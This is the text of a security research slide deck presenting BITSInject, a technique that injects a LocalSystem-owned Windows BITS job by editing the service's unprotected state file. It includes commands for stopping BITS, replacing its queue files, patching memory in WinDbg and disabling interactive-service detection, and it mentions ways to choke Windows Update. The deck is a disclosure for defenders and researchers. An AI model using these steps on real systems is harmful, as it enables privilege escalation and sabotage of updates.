BITSInject Control your BITS, get SYSTEM Dor Azouri Security Researcher @SafeBreach
Background Intelligent Transfer Service 2
A couple more bits about BITS Available since 2001 (Windows XP) Most known use: Windows Update Advanced features 3
A couple more bits about BITS Available since 2001 (Windows XP) Most known use: Windows Update Advanced features 4
DEMO Software updating itself using BITS 5
TOOL DEMO #1 BITSInject to open an interactive shell as NT AUTHORITY\SYSTEM, in session 0 6
7
BITS Background & Terms PowerShell bitsadmin 3rd-party 8
BITS Background & Terms PowerShell bitsadmin 3rd-party BITS Job Download Upload Upload-Reply 9
BITS Background & Terms PowerShell bitsadmin 3rd-party BITS Job Download Upload Upload-Reply COM Interfaces (C/C++) qmgrprxy.dll 10
BITS Background & Terms PowerShell bitsadmin 3rd-party BITS Job Download Upload Upload-Reply COM Interfaces (C/C++) qmgrprxy.dll qmgr.dll 11
BITS Background & Terms PowerShell bitsadmin 3rd-party BITS Job Download Upload Upload-Reply COM Interfaces (C/C++) qmgrprxy.dll qmgr.dll State File 12
Known Malicious Uses BITS as a malware downloader As a persistency mechanism (e.g. DNSChanger/Zlob.Q) As C&C communication 13
The inspiration? the way WU downloads and installs updates The drive? Jealousy … of how WU adds SYSTEM jobs 14
Some of LocalSystem Privileges ● Can open the registry key HKLM\SECURITY and SAM ● On a DC - has unrestricted access to AD Domain Service ● Has the network privileges of the machine ● Covert identity 15
Some of LocalSystem Privileges [SYSTEM whoami] - [Administrator whoami] = SeAssignPrimaryTokenPrivilege SeLockMemoryPrivilege SeTcbPrivilege SeCreatePermanentPrivilege SeAuditPrivilege 16
The Abuse 17
The Enabling Feature SetNotifyCmdLine 18
Naive Try - PSEXEC bitsadmin /CREATE I_WANT_YOUR_SYSTEM bitsadmin /ADDFILE I_WANT_YOUR_SYSTEM http://site.com/software.exe c:\temp\software.exe 19
God Created a Rock He Can’t Pick Up Unable to add file to job - 0x800704dd The operation being requested was not performed because the user has not logged on to the network bitsadmin /CANCEL I_WANT_YOUR_SYSTEM 20
How does wuaueng do the things it does? CoSwitchCallContext to the COM intf of qmgr.dll qmgr!CJobManagerExternal::CreateJob -> qmgr!CJob::AddFile -> qmgr!CJob::Resume -> qmgr!CJob::Transfer -> qmgr!CJob::BeginDownload 21
How does wuaueng do the things it does? CoSwitchCallContext to the COM intf of qmgr.dll qmgr!CJobManagerExternal::CreateJob -> qmgr!CJob::AddFile -> qmgr!CJob::Resume -> qmgr!CJob::Transfer -> qmgr!CJob::BeginDownload 22
Going after wuaueng Compare flow of calls between wuaueng and bitsadmin 1. qmgr!CJobManagerExternal::CreateJob -- identical 2. qmgr!CJobExternal::AddFile -- identical, but: Exception is thrown here (0x800704dd) 23
Going after wuaueng Compare flow of calls between wuaueng and bitsadmin 1. qmgr!CJobManagerExternal::CreateJob -- identical 2. qmgr!CJobExternal::AddFile -- identical, but: Exception is thrown here (0x800704dd) Reason: bad pairing of {Client SID} and {Session ID} Solution: Fake {Session ID} 24
Checkpoint #1 - AccessCheck One of the functions at the heart of the Windows security model It is boolean: GRANT or DENY IServerSecurity::CoImpersonateClient ➔ Impersonation token is checked against the job’s security descriptor ➔ IServerSecurity::CoRevertToself ➔
Checkpoint #1 - AccessCheck
Checkpoint #2 - Active Logon BITS requires the requesting user to be logged on for a job to continue operation C:\Windows\system32>qwinsta SESSIONNAME USERNAME ID STATE TYPE DEVICE 0 Disc >console 1 1 Active Rdp-tcp 65536 Listen
Faking Session ID {Client SID} = {Session ID} = 1 (From Job object) GetTokenInformation(12) SwitchToLogonToken CloneUserToken CLoggedOnUsers::FindUser({SID},...) in {Session ID} 28
Faking Session ID {Client SID} = {Session ID} = 1 (From Job object) GetTokenInformation(12) SwitchToLogonToken {SYSTEM} is NOT logged on in session {1} CloneUserToken CLoggedOnUsers::FindUser({SID},...) in {Session ID} 29
Faking Session ID 1. Breakpoint is placed just before the call to CJobManager::CloneUserToken 2. Run CMD/PowerShell as SYSTEM using psexec: Bitsadmin /create I_WANT_YOUR_SYSTEM Bitsadmin /addfile I_WANT_YOUR_SYSTEM <URL> <DestinationFile> 3. Got to breakpoint. Change the return value of the GetTokenInformation call to 0, which is the SYSTEM session ID (WinDbg): Memory change: [rsp+20h]=0 30
Faking Session ID {Client SID} = {Session ID} = {Session ID} = 0 (From Job object) GetTokenInformation(12) SwitchToLogonToken CloneUserToken CLoggedOnUsers::FindUser({SID},...) in {Session ID} 31
CNestedImpersonation::* Takes care of the token manipulations CNestedImpersonation::Impersonate(void) Uses ImpersonateLoggedOnUser(HANDLE hToken) ➔ The desired action is with impersonation, and then back to self 32
public enum JOB_STATE { Queued, Connecting, Transferring, → Suspended, Error, TransientError, Transferred, Acknowledged, Cancelled, Unknown }; 33
The State File is the Supervisor Represents the job queue C:\ProgramData\Microsoft\Network\Downloader\(qmgr0.dat|qmgr1.dat) Alternated update, current is: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS\StateIndex 34
The State File ● Straight-forward e.g. string representation: 07 00 00 00 ‘S’ 00 ‘Y’ 00 ‘S’ 00 ‘T’ 00 ‘E’ 00 ‘M’ 00 00 00 CJob::Serialize(class CQmgrWriteStateFile &) calls CQmgrStateFiles::Write(void const *,ulong) for each job property ● Unencrypted ● Partially protected 35
public enum JOB_STATE { Queued, Connecting, Transferring, Suspended, Error, TransientError, Transferred, Acknowledged, Cancelled, Unknown }; 36
sc stop bits timeout 5 del /Q /F C:\ProgramData\Microsoft\Network\Downloader\* >> Put modified state file sc start bits 37
38
39
SID Name (Level) Use Untrusted (0) S-1-16-0x0 Used by processes started by the Anonymous group. It blocks most write access. Low (1) Used by Protected Mode Internet Explorer. S-1-16-0x1000 Medium (2) Used by normal applications being launched while UAC is enabled. S-1-16-0x2000 applications launched UAC elevation, or if UAC is disabled and the user is an High (3) S-1-16-0x3000 administrator. System (4) Used by services and other system-level applications (Wininit, Winlogon, Smss...). S-1-16-0x4000 40
Migration of the Queue Just copy-paste the state files between machines Windows 7 Header: F5 6A 19 2B 7C 00 8F 43 8D 12 1C FC A4 CC 9B 76 Windows 10 Header: 28 32 ED 09 A6 C7 E9 45 8F 6D 36 D9 46 C2 7C 3E 00 00 00 00 00 00 00 00 41
42
A Cleaner Method Version Dependent Header State File Header Queue Header n++ Jobs Counter = n Job Header Job #0 Job Footer Job Header Job #x ... Job Footer Job Header Job #n Job Footer Queue Footer 43
BITSInject Injects a job with LocalSystem as owner Job is removed when finished Allows editing some of the job’s parameters, more in the future 44
Interactive Services Detection - UI0Detect sc stop UI0Detect reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows /v NoInteractiveServices /t REG_DWORD /d 1 /f sc start UI0Detect OR Non-interactive exe
TOOL DEMO #2 BITSInject non-interactive command 46
SimpleBITSServer A simple python implementation of a BITS server Can respond without a Content-Length header Accelerating the method by pushing job into the ERROR state * On Windows 10: Fake VSN to avoid network traffic 47
The Enabling Conditions ● Relying on state file data without verification ● Lack of unique machine identification ● File permissions integrity ● Clear, straight-forward object serialization to disk 48
Other Potential Abuses Interfere with a software update job: 1. WU-choking using file name exhaustion: C:\Windows\SoftwareDistribution\Download\GUID\BIT[0-9A-F]{1,4}\.tmp 49
Other Potential Abuses Interfere with a software update job: 1. WU-choking using file name exhaustion: C:\Windows\SoftwareDistribution\Download\GUID\BIT[0-9A-F]{1,4}\.tmp 69,904 50
Other Potential Abuses Interfere with a software update job: 1. WU-choking using file name exhaustion: 51
Other Potential Abuses Interfere with a software update job: 1. WU-choking using file name exhaustion: BIT[0-9A-F]{1,4}\.tmp 2. Change job state using BITSInject.py 3. Completely remove a job from queue using BITSInjerct.py 52
MSRC: “...A malicious administrator can do much worse things.” 53
Links BITSInject (Tool code + Parser): https://github.com/SafeBreach-Labs/BITSInject SimpleBITSServer: https://github.com/SafeBreach-Labs/SimpleBITSServer Email: dor.azouri@safebreach.com Twitter: @bemikre 54
Recommend
More recommend